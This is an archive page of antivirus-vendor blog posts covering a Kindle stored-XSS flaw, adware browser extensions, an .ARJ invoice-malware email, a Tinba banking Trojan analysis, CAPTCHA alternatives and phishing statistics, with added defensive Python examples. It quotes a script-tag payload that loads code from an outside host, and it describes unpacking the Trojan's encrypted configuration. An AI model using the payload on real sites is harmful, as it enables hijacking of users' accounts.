Category Archives: Antivirus Vendors

Free ebooks warning: Pirates ‘can hack into Amazon accounts’

Pirating ebooks is not just bad for the publishing industry: free ebooks available online can also be used to hack into Amazon accounts via the retail giant’s ‘Manage Your Kindle’ page, used to deliver ebook files to Kindle Readers, according to researcher Benjamin Daniel Mussler.

Mussler writes that simply changing the title of a free ebook is enough: when the victim opens the ‘Kindle Library’ page in a web browser, script embedded in the title runs in the context of Amazon’s site, The Digital Reader reports.

“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,” Mussler writes.

Engadget reports that Mussler discovered the security issue last October and that Amazon patched it quickly. It was reintroduced, however, when the company launched a new version of the “Manage Your Kindle” web page.

Free ebooks: a threat?

Mussler writes that the threat affects, “Everyone who uses Amazon’s Kindle Library,” but stresses that the flaw affects those who pirate free ebooks in particular.

The attack takes place, he writes, “Once an attacker manages to have an e-book (file, document, …) with a title like <script src="https://www.example.org/script.js"></script> added to the victim’s library.”

Mussler says, “Users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.”
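The mechanism described above is a stored cross-site scripting flaw: text the attacker controls (the ebook title) is written into the library page’s HTML without being escaped, so the browser treats it as markup rather than as a title. The Python below is an added example, not Amazon’s code: the titles are constructed, and the two rendering functions are a minimal stand-in for the page template, showing the vulnerable concatenation beside the escaped version together with a check that the fix holds.

```python
import html
import re

# Constructed sample titles (not taken from the page): a benign title, one of the shape
# Mussler describes (a script pulled from an attacker-controlled origin), and one with
# characters that are harmless but must still be escaped correctly.
SAMPLE_TITLES = [
    "A Perfectly Ordinary Novel",
    '<script src="https://www.example.org/script.js"></script>',
    "Tom & Jerry <3",
]


def render_library_unsafe(titles):
    """Vulnerable rendering: each title string is spliced into the page markup verbatim,
    so a title containing a <script> element becomes a live script in the page."""
    rows = "".join(f"<li>{title}</li>" for title in titles)
    return f'<ul id="library">{rows}</ul>'


def render_library(titles):
    """Hardened rendering: every title is HTML-escaped at the point of insertion, so
    '<', '>', '&' and quotes reach the browser as character references, not markup."""
    rows = "".join(f"<li>{html.escape(title, quote=True)}</li>" for title in titles)
    return f'<ul id="library">{rows}</ul>'


_SCRIPT_START_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(rendered_html):
    """Regression check on the rendered output: is there still an unescaped <script> start tag?"""
    return _SCRIPT_START_TAG.search(rendered_html) is not None
```

Any template engine with autoescaping switched on (Jinja2, Django templates) does what render_library does by default; this bug class appears when a value is inserted by string concatenation or a template marks untrusted data as safe. A Content-Security-Policy that restricts script-src to the site’s own origin would have been a second line of defence against the external script.js load, though not against inline payloads unless those are blocked as well.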

Kindle users beware

The reappearance of the flaw was highlighted by the German ebook blog Alles Book. The site also produced a proof-of-concept ebook download to demonstrate that it worked. As of the time of writing, the flaw is still active, Mussler reports.

Mussler says, “Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.”

The post Free ebooks warning: Pirates ‘can hack into Amazon accounts’ appeared first on We Live Security.

Browser Extensions that nobody wants… but a lot of people have!

The marketplace for browser extensions is quite big: for Firefox alone, more than four billion add-ons have been downloaded. But not every extension makes the user happy:

In the last couple of weeks we have monitored the rampant spread of browser extensions that harm the user in a new way: by displaying unwanted advertisements. The list of names of such extensions is long: Browsefox, Swiftbrowse, Betterbrowse, Browsesmart, Browseburst… All share the same two major traits: the user doesn’t want them, and they are hard to remove from the computer.

Of course, we have kept our attention on this kind of browser extension, with the aim of protecting and warning Avira customers. We tracked the extensions’ speed of global growth, created specific Avira Intelligent Repair System (AIRS) routines, and adjusted our engine to detect these types of unwanted browser extensions.

Finally, with the engine detection pattern “Adware/Browsefox.Gen,” included in Avira version 8.3.24.22, we took the first step forward.

And the first results are striking:

Since the release of that engine version we have recorded more than 20 million detections across the ‘Avira World’. As for the spread of these extensions: during our initial research we noticed extreme propagation in Germany, but after the release of the generic detection we saw that many more regions of the world have these unwanted extensions installed. Now we have a much better picture of their global movement.

[Figure: worldwide detections of the extensions]

But what exactly are these browser extensions doing on your computer? Their primary goal is to make money, and, as mentioned, their means of doing so is to display unwanted advertisements once installed: for example, coupons with their offers. Every additional advertisement shown earns them cash.

[Figure: advertisements displayed by the extension]

The list of names using this tactic is long. Very long. But if you take a look at some of their “official” websites, you will see that they are all related. They share the same style and options. Only the name of the product changes, along with different photos…

[Figure: the “official” websites of several of these extensions, identical apart from the product name and photos]

Also interesting is the word ‘official’. We tried to find out the company or person behind these sites, but there is no official contact information.

[Figure: the extensions’ blog]

How would you get this extension? Most likely it is bundled with the installer of some other software. For example, if you are looking for a new internet browser, search for it in your search engine of choice and pick the first result: you get an installer and may not notice that it did not come from the official website. While the browser is being installed, the extension is installed too, silently. The behaviour of these components is typically the same. They create new folders on your computer in the following locations. Here is one example with the extension ‘BrowseBurst’:

%PROGRAM FILES%\BrowseBurst
    bin\
        utilBrowseBurst.exe
        BrowseBurst.BrowserAdapter.exe
        FilterApp_C64.exe
        BrowseBurst.PurBrowse64.exe
        BrowseBurst.PurBrowse.exe
    BrowseBurst\
        updater.exe

Installing the extension also makes several changes in the registry:

HKLM\Software\BrowseBurst
HKLM\Software\Wow6432Node\BrowseBurst
HKLM\Software\Microsoft\Internet Explorer\Approved Extensions
    Value: %CLSID%
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{%CLSID%}
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowseBurst
HKLM\SYSTEM\CurrentControlSet\services\%ExtensionName%

The extension may also register a Browser Helper Object (BHO), a component that the browser loads into its own process and keeps in memory for as long as it runs. This is why the combination of detection and an AIRS repair routine is so important: a loaded component has to be unloaded before its files can be removed.
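One way to triage a machine against the indicators above without vendor tooling is to export the relevant registry hives (reg export) and correlate each BHO registration with the COM server DLL its CLSID points to. The Python below is an added example, not Avira’s AIRS routine: the .reg text is constructed, and the CLSID, DLL name and service name in it are placeholders, since the post gives only %CLSID% and %ExtensionName%.

```python
import re

# Family names from the post above; matched case-insensitively against paths and key names.
ADWARE_FAMILY = ("browsefox", "swiftbrowse", "betterbrowse", "browsesmart", "browseburst")

BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
APPROVED_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions"
SERVICES_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"

# Constructed .reg export in the format `reg export` writes. The CLSIDs, the BHO DLL name
# and the service name are placeholders (hypothetical), not values taken from the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01234567-89AB-CDEF-0123-456789ABCDEF}]
@="BrowseBurst"

[HKEY_CLASSES_ROOT\CLSID\{01234567-89AB-CDEF-0123-456789ABCDEF}\InprocServer32]
@="C:\\Program Files\\BrowseBurst\\bin\\BrowseBurst.BrowserAdapter.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions]
"{01234567-89AB-CDEF-0123-456789ABCDEF}"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BrowseBurst]
"ImagePath"="C:\\Program Files\\BrowseBurst\\BrowseBurst\\updater.exe"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DEADBEEF-0000-0000-0000-000000000001}]
@="Legitimate Vendor Helper"

[HKEY_CLASSES_ROOT\CLSID\{DEADBEEF-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Program Files\\Vendor\\helper.dll"
'''


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: data}} ('@' is the default value).
    Quoted string data has its doubled backslashes collapsed; hex:/dword: data is kept verbatim."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            name = name if name == "@" else name.strip('"')
            if data.startswith('"'):
                data = data.strip('"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def _is_family(text):
    lowered = text.lower()
    return any(name in lowered for name in ADWARE_FAMILY)


def triage(keys):
    """Return (kind, identifier, detail) tuples for entries tied to the family: BHOs whose
    COM server DLL or display name matches, IE Approved Extensions entries for those same
    CLSIDs, and services named after one of the extensions."""
    findings, flagged_clsids = [], set()
    for path, values in keys.items():
        if path.lower().startswith(BHO_KEY.lower() + "\\"):
            clsid = path[len(BHO_KEY) + 1:]
            server_key = "HKEY_CLASSES_ROOT\\CLSID\\" + clsid + "\\InprocServer32"
            server = keys.get(server_key, {}).get("@", "")
            if _is_family(server) or _is_family(values.get("@", "")):
                flagged_clsids.add(clsid)
                findings.append(("bho", clsid, server))
        elif path.lower().startswith(SERVICES_KEY.lower() + "\\"):
            name = path.rsplit("\\", 1)[1]
            if _is_family(name):
                findings.append(("service", name, values.get("ImagePath", "")))
    for clsid in sorted(flagged_clsids):
        if clsid in keys.get(APPROVED_KEY, {}):
            findings.append(("approved_extension", clsid, "pre-approved in Internet Explorer"))
    return findings


def run_sample():
    return triage(parse_reg_export(SAMPLE_REG))
```

On a live system the same correlation tells you which file to unload before cleanup: the Browser Helper Objects key gives the CLSID, HKCR\CLSID\{…}\InprocServer32 gives the DLL the browser actually loads, and a matching value under Approved Extensions is what lets the add-on bypass Internet Explorer’s enable-add-on prompt.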

If you would like to know more about the extensions’ behaviour, our virus researchers have written a detailed description:

Adware/Browsefox.Gen: http://www.avira.com/en/support-threats-summary/tid/8495/tlang/en

The post Browser Extensions that nobody wants… but a lot of people have! appeared first on Avira Blog.

Beware overdue invoice malware attack, wrapped in an .ARJ file!

If you’ve been messing around with technology for a while, you may remember the good old days of acoustic couplers, ZModem, and Bulletin Board Systems (BBSes).

These were the days before the worldwide web had taken off, when even the slowest broadband speeds would have been sheer fantasy.

And because getting an online connection was slow and sometimes flaky, it wasn’t at all uncommon for techies to compress their programs and downloadable files into tight little packages, to make the download as painless as possible for users. The most famous compression tool of all was PKZip, created by the late Phil Katz, and the .ZIP file format is still widely used today.

But there were other data compression tools which competed for .ZIP’s crown, each with their own loyal bands of followers. And one of the most famous was .ARJ.

And, to be honest, ARJ was pretty cool.

So you can imagine my delight when I discovered today that .ARJ wasn’t entirely forgotten and consigned to the dusty annals of history. Instead, it is still being used – albeit by malware authors…

Here is an example of a typical malicious email, spammed out by online criminals:

[Image: example of the overdue-invoice malware email, transcribed below]

Subject: Overdue invoice #14588516
Attached file: invc_2014-09-15_7689099765.arj

Morning,

I was hoping to hear from you by now. May I have payment on invoice #45322407834 today please, or would you like a further extension?

Best regards,
Mauro Reddin

Of course, the social engineering might have been a little better thought out. For instance, the invoice numbers quoted in the email don’t match each other.

But it is easy to imagine how many users, alarmed at being accused of a late payment, would open the attached .ARJ file without thinking about the possible consequences.

At that point the .ARJ file is opened and its contents extracted. (Windows has no built-in support for ARJ archives, so this step relies on the victim having a third-party archiver such as 7-Zip or WinRAR, both of which can open the format.)

As Conrad Longmoore explains on the Dynamoo blog, inside the .ARJ archive is an executable program designed to infect your Windows computer.

Before you know it, your Windows PC could have been hijacked by a hacker and recruited into a botnet. Whereupon the remote attacker could command it to send spam on their behalf, launch denial-of-service attacks or steal your personal information.

That’s why you should always be wary of opening unsolicited files sent to you out of the blue via email.

The good news for users of ESET anti-virus products is that it is detected as a variant of Win32/Injector.BLWX. But if you are using a different vendor’s security product you may wish to double-check that it has been updated to protect against the threat.
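Two of the signals in this lure are mechanical enough to check before a user ever sees the message: an attachment in a legacy archive format, and invoice numbers that disagree between subject and body. The Python below is an added example, not ESET’s detection. It rebuilds a lookalike of the message quoted above with Python’s email package (the sender address and recipient are invented, and the attachment is filler bytes behind the ARJ header ID 0x60 0xEA, not an actual archive or malware) and runs simple triage over it.

```python
import re
from email.message import EmailMessage

ARJ_MAGIC = b"\x60\xea"   # ARJ header ID 0xEA60, stored little-endian at the start of the file
ARCHIVE_EXTS = {".arj", ".zip", ".rar", ".7z", ".cab", ".ace", ".lzh"}
INVOICE_RE = re.compile(r"invoice\s*#?\s*(\d+)", re.IGNORECASE)


def build_sample_message():
    """Constructed lookalike of the lure quoted above. Addresses are invented and the
    attachment is 30 bytes of filler behind the ARJ header ID, not a real archive."""
    msg = EmailMessage()
    msg["From"] = "Mauro Reddin <mauro.reddin@example.com>"
    msg["To"] = "accounts@example.net"
    msg["Subject"] = "Overdue invoice #14588516"
    msg.set_content(
        "Morning,\n\nI was hoping to hear from you by now. May I have payment on "
        "invoice #45322407834 today please, or would you like a further extension?\n\n"
        "Best regards,\nMauro Reddin\n"
    )
    msg.add_attachment(ARJ_MAGIC + b"\x00" * 30, maintype="application",
                       subtype="octet-stream", filename="invc_2014-09-15_7689099765.arj")
    return msg


def invoice_numbers(text):
    """All invoice numbers mentioned in a piece of text, as a set of digit strings."""
    return set(INVOICE_RE.findall(text or ""))


def triage(msg):
    """Return a list of human-readable findings for one message."""
    findings = []
    body_part = msg.get_body(preferencelist=("plain",))
    body_text = body_part.get_content() if body_part is not None else ""
    subj_nums = invoice_numbers(str(msg["Subject"] or ""))
    body_nums = invoice_numbers(body_text)
    # The lure quotes one invoice number in the subject and a different one in the body.
    if subj_nums and body_nums and subj_nums.isdisjoint(body_nums):
        findings.append(f"invoice number mismatch: subject {sorted(subj_nums)} vs body {sorted(body_nums)}")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        if ext in ARCHIVE_EXTS:
            findings.append(f"archive attachment: {name}")
        # Check the header bytes as well as the extension: a renamed file keeps its magic,
        # and an .arj that does not start with the ARJ header ID is suspicious in itself.
        by_magic, by_ext = payload.startswith(ARJ_MAGIC), ext == ".arj"
        if by_magic or by_ext:
            how = ("magic and extension" if by_magic and by_ext
                   else "magic only (renamed?)" if by_magic
                   else "extension only (not a real ARJ)")
            findings.append(f"ARJ archive, a legacy format rarely seen in legitimate mail ({how}): {name}")
    return findings
```

Listing the archive’s members to see the executable inside needs an ARJ parser, which is out of scope here; at gateway level the point is that the format itself, together with the mismatched invoice numbers, is enough to quarantine the message for a second look.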

The post Beware overdue invoice malware attack, wrapped in an .ARJ file! appeared first on We Live Security.

Tiny Banker Trojan targets customers of major banks worldwide

The Tinba Trojan aka Tiny Banker targeted Czech bank customers this summer; now it’s gone global.

After analysing a payload distributed by the Rig exploit kit, the AVAST Virus Lab identified it as the Tinba banker. This Trojan targets a wide range of banks, including Bank of America, ING Direct and HSBC.

[Figure: HSBC bank page]

Compared with our previous blog post, Tinybanker Trojan targets banking customers, this variant has some differences, which we describe later.

How does Tiny Banker work?

  1. The user visits a website infected with the Rig exploit kit (Flash or Silverlight exploit).
  2. If the system is vulnerable, the exploit runs malicious code which downloads and executes the malware payload, the Tinba Trojan.
  3. Once the computer is infected and the user tries to log into one of the targeted banks, the webinjects come into effect and the victim is asked to fill out a form with personal data.
  4. If the victim confirms the form, the data is sent to the attackers. This includes credit card information, address, social security number, etc. An interesting field is “Mother’s Maiden Name”, which is often used as a security question to reset a password.

The example of an injected form targeting Wells Fargo bank customers is displayed in the image below.

[Figure: injected form targeting Wells Fargo customers]

Differences from the Czech campaign

In the case of the Tinba “Tiny Banker” targeting Czech users, the payload was simply encrypted with a hardcoded RC4 password. In this case a few more steps were needed. First we located the folder with the installed banking Trojan. It contained an executable file and the configuration file; the next figure shows the encrypted configuration file.

[Figure: encrypted configuration file]

First, an XOR with the hardcoded 32-bit value 0xac68d9b2 was applied.

[Figure: configuration file after the XOR step]

Then RC4 decryption with a hardcoded password was performed. After RC4 decryption we noticed an AP32 marker at the beginning of the decrypted payload, which indicates aPLib compression.

[Figure: configuration file after RC4 decryption, showing the AP32 marker]

After aPLib decompression, therefore, we got the configuration file in plaintext. Studying this roughly 65 KB plaintext file, we noticed that it targets financial institutions worldwide.

[Figure: decompressed configuration file in plaintext]
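The three layers described above (32-bit XOR, RC4, aPLib) can be peeled in code. The Python below is an added example written from the analysis, not the AVAST lab’s tooling. The XOR constant is the one reported above; the byte order of the XOR (little-endian 32-bit words) and the RC4 key are assumptions, since the post does not publish the key; the AP32 header layout follows aPLib’s “safe” header (tag, header size, packed size, packed CRC-32, original size, original CRC-32, with the CRC assumed to be the standard CRC-32 that zlib computes); and the packed body is constructed filler rather than real aPLib output, so the example stops at validating the header and hands the blob to a decompressor it does not include.

```python
import struct
import zlib

XOR_DWORD = 0xAC68D9B2          # constant reported in the analysis above
APLIB_MARKER = b"AP32"          # tag of an aPLib "safe" header
RC4_KEY = b"placeholder-key"    # assumption: the real Tinba key is not given on the page


def xor_dwords(data, value=XOR_DWORD):
    """XOR the buffer with `value` repeated as a little-endian dword (assumed byte order).
    A trailing partial word is XORed with the leading key bytes. Self-inverse."""
    key = struct.pack("<I", value)
    return bytes(b ^ key[i & 3] for i, b in enumerate(data))


def rc4(key, data):
    """Plain RC4 (KSA + PRGA, no drop); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_aplib_header(blob):
    """Read the 24-byte aPLib safe header: tag, header size, packed size, packed CRC-32,
    original size, original CRC-32 (all little-endian dwords)."""
    tag, hdr_size, packed_size, packed_crc, orig_size, orig_crc = struct.unpack_from("<4sIIIII", blob, 0)
    if tag != APLIB_MARKER:
        raise ValueError("not an AP32 blob")
    return {"header_size": hdr_size, "packed_size": packed_size, "packed_crc": packed_crc,
            "orig_size": orig_size, "orig_crc": orig_crc}


def unwrap_config(blob, rc4_key=RC4_KEY):
    """Peel the outer layers in the order the analysis found them: dword XOR, then RC4.
    Returns the aPLib-packed blob for a decompressor (not included). Raises if the AP32
    marker is missing, which usually means a wrong key, wrong constant or a different build."""
    packed = rc4(rc4_key, xor_dwords(blob))
    if not packed.startswith(APLIB_MARKER):
        raise ValueError("no AP32 marker after XOR+RC4")
    hdr = parse_aplib_header(packed)
    body = packed[hdr["header_size"]:hdr["header_size"] + hdr["packed_size"]]
    if zlib.crc32(body) & 0xFFFFFFFF != hdr["packed_crc"]:
        raise ValueError("packed CRC mismatch: truncated or mis-decrypted blob")
    return packed


def wrap_config(packed, rc4_key=RC4_KEY):
    """Inverse of unwrap_config (RC4, then XOR); used only to build the sample below."""
    return xor_dwords(rc4(rc4_key, packed))


def make_sample_packed(body):
    """Put an AP32 header in front of `body`. The body is constructed filler, not real aPLib
    output, so the original size/CRC fields are simply set to the body's own values."""
    crc = zlib.crc32(body) & 0xFFFFFFFF
    header = struct.pack("<4sIIIII", APLIB_MARKER, 24, len(body), crc, len(body), crc)
    return header + body


SAMPLE_PACKED = make_sample_packed(b"<constructed filler standing in for the ~65 KB packed config>")
SAMPLE_BLOB = wrap_config(SAMPLE_PACKED)   # what would sit on disk next to the Trojan
```

Running unwrap_config on a real sample with the wrong key yields bytes with no AP32 marker, which is the quickest tell that the constant, the key or the layer order is wrong; the CRC check catches a truncated file before a decompressor is fed garbage.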

Targeted financial institutions

[Figures: screenshots of targeted bank pages, including US Bank and TD Bank]

Conclusion

Keep your software up to date. Software updates are necessary to patch vulnerabilities; unpatched vulnerabilities expose you to serious risk, which may lead to financial loss. For more protection, use security software such as avast! Antivirus with the Software Updater feature, which informs you about updates available for your computer.

SHA-256 hashes and detections

Exploits

CC0A4889C9D5FFE3A396D021329BD88D11D5159C3B42988EADC1309C9059778D
1266294F6887C61C9D47463C2FE524EB1B0DA1AF5C1970DF62424DA6B88D9E2A

Payload

856E486F338CBD8DAED51932698F9CDC9C60F4558D22D963F56DA7240490E465
88F26102DB1D8024BA85F8438AC23CE74CEAE609F4BA3F49012B66BDBBE34A7B

avast! detections: MSIL:Agent-CBZ [Expl], SWF:Nesty-A [Expl], Win32:Banker-LAU [Trj]

Acknowledgement

This analysis was done collaboratively by David Fiser and Jaromir Horejsi.


Fed up with CAPTCHA? How to avoid it?


It is always annoying. You enter a website and suddenly a CAPTCHA confronts you, unsure whether you are a human or a robot with, generally, malicious intentions: crossed-out or distorted characters that you must decipher so that the system can be sure you have no intention of exploiting the website’s resources beyond what is allowed. It is extremely tiresome, because it is not easy to make out the combination of letters and numbers you are shown in order to prove that you are not an intruder.

At last, after many years, someone has set out to implement new methods that are less of a hassle. We will still not be able to get away without proving that we are made of flesh and bone and have no bad intentions, but they thought it better to do so in a more fun and entertaining way than by wasting time trying to decipher completely illegible letters and numbers.

With this goal in mind, a group of researchers at the University of Alabama at Birmingham got down to work. Tired of pesky CAPTCHAs, they decided to create a new method by which websites that consider it necessary can check whether a human or a robot is on the other side of the screen. Their plans also included finding a system that is more entertaining for users with good intentions while setting up more barriers for those who program a bot to act like a human.


This is how what they call a ‘dynamic cognitive game’, or DCG, came about. The team, consisting of Manar Mohamed, Song Gao and Chengcui Zhang and led by Nitesh Saxena, has published a new way of checking whether someone is trying to enter a website to abuse the services it offers.

The new system challenges the user with a simple, good-natured game: a puzzle that, unlike a CAPTCHA, will not try your patience by failing you time after time because you cannot make out the letters and numbers on screen. Now all you have to do is, for example, select the object that is not a boat. Or, even easier, a straightforward drag-and-drop task: dragging geometric figures to the space with the same shape.

As you can see, these are extremely easy actions for any internet user, but they hinder bots programmed to complete many CAPTCHAs in the blink of an eye. While a human only has to identify the object and drag it, and can solve the puzzle on the first attempt, the programs used by spammers need several attempts. After so many failed tries, the mechanism detects the strange behaviour and classifies the visitor as an intruder.

What’s more, this new method from the researchers at the University of Alabama at Birmingham is also proposed as a way of deterring those with malicious intentions who have moved from programs to new ways of exploiting website resources.

As crazy as it may seem, there are people who, under coercion or for money (usually a very small amount), work non-stop filling out forms on websites for someone who needs them completed. These cognitive games will make their job harder, because the system is not as mechanical as the one used by the tiresome CAPTCHAs.

It’s not the first and it won’t be the last alternative

Many people, fed up with the tedious verification process of entering letters and numbers, have suggested alternatives to the system devised by the Guatemalan Luis von Ahn in 2000: a maths puzzle, a task puzzle, or even deciphering an audio message in which someone says something in a distorted voice.

However, it is going to be very difficult to do away with CAPTCHA completely. Not because the new systems are more or less reliable, but because, thanks to these and without having the slightest idea, we are working for Google. Without a contract or payment of any kind, whenever we complete a CAPTCHA or reCAPTCHA to prove that we are a human who wants to open a Gmail account, we are contributing to that company’s goal of digitising all of the books in the world. Did you know that?

The post Fed up with CAPTCHA? How to avoid it? appeared first on MediaCenter Panda Security.

Phishing email: UK hit with three times as many ‘bad’ links as U.S.

British internet users opening a spam email are three times more likely to be facing a malicious URL than users in the US, according to new research by phishing email specialists Proofpoint. German and French internet users were hit by fewer still, with just a fifth of the levels British internet users endure.

British users appear to be being targeted with high levels of financial malware, such as the banking Trojan Dyre.

Oddly, this finding does not correlate with a high level of spam email targeting the country: Germans receive the highest percentage of spam email overall, according to Tech World.

The findings come from an analysis of seven billion URLs monitored every week over a three week period this summer.

Phishing email: smells fishy?

Tech World comments, “This raises the possibility that the higher phishing email levels aimed at the UK are a random fluctuation and a result of the time period chosen rather than a fundamental trend.”

Proofpoint responded via email that the high level of targeted financial phishing email suggested that Britain was being targeted with malware simply because it brought lucrative returns.

“The attacks are clearly financially motivated. We’ve historically seen higher volumes of attacks targeted at regions that generate more success for the attackers because that’s where the money is,” said Proofpoint VP of security, Kevin Epstein.

“Relative to other countries in this report, this is a startlingly high number of targeted attacks against the UK. Given the financial motivations of the attacks, this strongly suggests cybercriminals have found UK organizations to be an unusually lucrative target.”

Dyre warning for British users

Infosecurity Magazine points out that among the malicious payloads delivered to British users was a high number of emails containing the Dyre banking Trojan, which was in the headlines again last week, after the malware was used to target users of the popular Customer Relationship Management software Salesforce.

Named Dyre, or Dyreza (and detected by ESET software as Win32/Battdil.A), the Trojan software was discovered by researchers investigating a phishing scam that was spreading via Dropbox. It is believed to be a completely new family of malware, similar to but sufficiently distinct from, the Zeus malware.

Dyre has been designed to target certain banks in particular – Bank of America, CitiGroup, but also a large number of British banks, in particular NatWest, RBS and Ulsterbank.

It is thought to be an example of ‘crime-as-a-service’ – malware for hire to the highest bidder. It has been found able to bypass both SSL encryption and two-factor authentication systems.

Speaking to Infosecurity, Proofpoint suggested that the malware had, “become increasingly popular in the wake of the Gameover Zeus takedown.”

 

The post Phishing email: UK hit with three times as many ‘bad’ links as U.S. appeared first on We Live Security.